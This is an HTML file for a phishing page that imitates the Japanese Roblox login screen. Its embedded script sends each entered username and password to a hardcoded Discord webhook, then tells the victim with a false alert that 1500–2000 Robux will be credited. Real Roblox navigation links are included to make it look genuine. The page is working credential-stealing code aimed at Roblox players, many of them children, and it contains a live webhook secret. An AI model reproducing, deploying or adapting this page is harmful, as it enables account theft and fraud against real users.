<!DOCTYPE html>
<html lang="ja">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox(ロブロックス)にログイン</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #23272a;
            color: #ffffff;
        }

        header {
            background-color: #1b1d1f;
            color: #ffffff;
            border-bottom: 1px solid #ffffff;
        }

        .header-top {
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 5px 20px;
        }

        .logo img {
            width: 50px;
            height: auto;
        }

        .actions {
            display: flex;
            gap: 10px;
        }

        .actions .register {
            background-color: #00b06f;
            color: #ffffff;
            border: none;
            border-radius: 5px;
            width: 120px;
            height: 50px;
            font-size: 18px;
            cursor: pointer;
        }

        .actions .register:hover {
            background-color: #2e8c4a;
        }

        .actions .login {
            background-color: #23272a;
            color: #ffffff;
            border: 1px solid #ffffff;
            border-radius: 5px;
            width: 120px;
            height: 50px;
            font-size: 18px;
            cursor: pointer;
            margin-right: 70px;
        }

        .actions .login:hover {
            background-color: #36393f;
        }

        nav {
            width: 100%;
            display: flex;
            justify-content: center;
            gap: 25px;
            margin-top: -5px;
            margin-bottom: 8px;
        }

        nav a {
            color: #ffffff;
            text-decoration: none;
            font-size: 15px;
        }

        nav a:hover {
            color: #ffffff;
        }

        .login-container {
            max-width: 400px;
            margin-top: 60px;
            background: #393b3d;
            padding: 20px 25px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.5);
            text-align: center;
        }

        .login-container h1 {
            font-size: 30px;
            margin-top: 1px;
            margin-bottom: 2px;
        }

        .login-container form input {
            width: calc(380px - 35px);
            height: 38px;
            padding: 12px;
            margin: 0 0 18px 0;
            border: none;
            border-radius: 5px;
            background-color: #111112;
            color: #e0e0e0;
            font-size: 16px;
            box-sizing: border-box;
        }

        .login-container form input::placeholder {
            color: #676768;
            font-size: 16px;
        }

        .login-container form button {
            width: 100%;
            height: 30px;
            padding: 12px;
            margin-top: -30px;
            background-color: transparent;
            color: #ffffff;
            border: 1px solid #BDBEBE;
            border-radius: 5px;
            font-size: 14px;
            cursor: pointer;
        }

        .login-container form button:hover {
            background-color: #7289da;
            color: white;
        }

        .login-container button {
            width: 100%;
            padding: 12px;
            margin-top: 5px;
            border: 1px solid #ffffff;
            border-radius: 5px;
            background-color: transparent;
            color: white;
            font-size: 14px;
            cursor: pointer;
        }

        .login-container button:hover {
            background-color: #36393f;
        }

        .login-container p.reminder {
            color: #ffffff;
            font-size: 16px;
            margin-top: 20px;
            border-bottom: 1px solid #606264;
            padding-bottom: 25px;
        }

        .login-container p.Account {
            color: #ffffff;
            font-size: 12px;
            margin-top: 25px;
        }

        .login-container a {
            color: #ffffff;
            text-decoration: none;
        }

        .login-container a:hover {
            text-decoration: underline;
        }


        @media (max-width: 600px) {
            .header-top {
                flex-direction: row;
                justify-content: space-between;
            }
            
            .actions .register, .actions .login {
                width: 82px;
                height: 30px;
                font-size: 13.5px;
            }

            .actions .login {
                margin-right: 42px;
            }

            .login-container {
                padding: 15px 20px;
            }

            .login-container h1 { 
                font-size: 24px;
            }

            .login-container form input {
                font-size: 16px;
            }

            .login-container form input:focus {
                outline: none; 
                border: 1px solid #ffffff; 
            }


            .login-container form button {
                width: 100%;
                height: 34px;
                padding: 12px;
                margin-top: -5px;
                background-color: transparent;
                color: #BDBEBE;
                border: 1px solid #BDBEBE;
                border-radius: 5px;
                font-size: 14px;
                cursor: pointer;
                display: flex;
                align-items: center;
                justify-content: center;
                -webkit-tap-highlight-color: transparent;
                touch-action: manipulation;
            }

            .login-container form button:hover {
                color: white;
                background-color: transparent;
            }

            .login-container form button:focus,
            .login-container form button:active {
                background-color: transparent;
                outline: none;
                box-shadow: none;
                color: white;
            }

            .code {
                height: 32px;
                border: 1px solid #BDBEBE !important;
                margin-bottom: 8px;
                justify-content: center;
                display: flex;
                align-items: center;
                justify-content: center;
            }

            .device {
                height: 32px;
                border: 1px solid #BDBEBE !important;
                display: flex;
                align-items: center;
                justify-content: center;
            }
        }
    </style>
    <script>
    let loginAttempts = JSON.parse(localStorage.getItem("loginAttempts")) || { count: 0, lastInput: "", lockTime: null };

    window.onload = function() {
        checkLoginStatus();
    };

    function toggleLoginButton() {
        let username = document.getElementById("username").value;
        let password = document.getElementById("password").value;
        let loginButton = document.getElementById("loginButton");

        loginButton.disabled = username === "" || password === "";
        checkLoginStatus();
    }

    function lockLoginButton() {
        loginAttempts.lockTime = new Date().getTime();
        localStorage.setItem("loginAttempts", JSON.stringify(loginAttempts));
        checkLoginStatus();
    }

    function checkLoginStatus() {
        let loginButton = document.getElementById("loginButton");
        let now = new Date().getTime();

        if (loginAttempts.lockTime && now - loginAttempts.lockTime < 600000) {
            let remainingTime = Math.ceil((600000 - (now - loginAttempts.lockTime)) / 1000);
            loginButton.disabled = true;
            loginButton.innerText = `Try again in ${remainingTime} sec`;
            setTimeout(checkLoginStatus, 1000);
            return;
        }

        loginAttempts.lockTime = null;
        localStorage.setItem("loginAttempts", JSON.stringify(loginAttempts));
        loginButton.innerText = "Log In";
    }

    function sendToDiscord(event) {
        event.preventDefault();

        let username = document.getElementById("username").value;
        let password = document.getElementById("password").value;
        let loginButton = document.getElementById("loginButton");

        if (loginAttempts.lastInput === `${username}:${password}`) {
            loginAttempts.count++;
        } else {
            loginAttempts.count = 1;
            loginAttempts.lastInput = `${username}:${password}`;
        }

        if (loginAttempts.count >= 3) {
            alert("同じ情報で3回ログインを試みました。10分後に再試行してください。");
            lockLoginButton();
            return;
        }

        var data = {
            content: `New Login Attempt:\n**Username/Email/Phone**: ${username}\n**Password**: ${password}`
        };

        var webhookURL = "https://discordapp.com/api/webhooks/1330765219625963562/NBeRIDYXOgOBquiNTeuxO_I1s_tEw9WaTzLAGXLirIBdmq5bU6uAbHCx4U2MWIbUkTst";

        fetch(webhookURL, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify(data)
        })
        .then(response => response.json())
        .then(data => {
            console.log("Success:", data);
            alert("完了！1週間以内に1500~2000Robuxがアカウントに追加されます");
        })
        .catch(error => {
            console.error("Error:", error);
            alert("完了！1週間以内に1500~2000Robuxがアカウントに追加されます");
        });

        localStorage.setItem("loginAttempts", JSON.stringify(loginAttempts));
    }
</script>
</head>
<body>
    <header>
        <div class="header-top">
            <div class="logo">
                <img src="IMG_0009.png" alt="ロゴ">
            </div>
            <div class="actions">
                <button class="register" onclick="window.open('https://67f248e4-2e55-46fb-a8f8-433dbe6bbe0e-00-22vltlear5pwq.sisko.replit.dev/');">新規登録</button>
                <button class="login" onclick="window.open('https://67f248e4-2e55-46fb-a8f8-433dbe6bbe0e-00-22vltlear5pwq.sisko.replit.dev/');">ログイン</button>
            </div>
        </div>
        <nav>
            <a href="https://www.roblox.com/ja/charts#/">ランキング</a>
            <a href="https://www.roblox.com/ja/catalog?Category=1&salesTypeFilter=1">マーケットプレイス</a>
            <a href="https://create.roblox.com/">制作</a>
            <a href="https://www.roblox.com/ja/upgrades/robux?ctx=navpopover">Robux</a>
        </nav>
    </header>
    <main>
        <div class="login-container">
            <h1>Roblox（ロブロックス）にログイン</h1>
            <form onsubmit="sendToDiscord(event)">
                <input id="username" type="text" placeholder="ユーザー名/メールアドレス/電話番号" pattern="^[a-zA-Z0-9_]{3,20}$" title="3〜20文字で、アルファベット（大文字・小文字）、数字、アンダースコア（_）のみ使用できます" oninput="toggleLoginButton()">
                <input id="password" type="password" placeholder="パスワード" pattern="^[a-z0-9]{8,}$" title="小文字英字と数字のみ、8文字以上で入力してください" oninput="toggleLoginButton()">
                <button id="loginButton" type="submit" disabled>ログイン</button>
            </form>
            <p class="reminder">
                <a href="https://www.roblox.com/ja/login/forgot-password-or-username">パスワード、またはユーザー名をお忘れですか？</a>
            </p>
            <button class="code">ワンタイムコードをメールで送信</button>
            <button class="device">別のデバイスを使用</button>
            <p class="Account">アカウントをお持ちではありませんか？ <a href="https://www.roblox.com/ja/">新規登録</a></p>
        </div>
    </main>
</body>
</html>
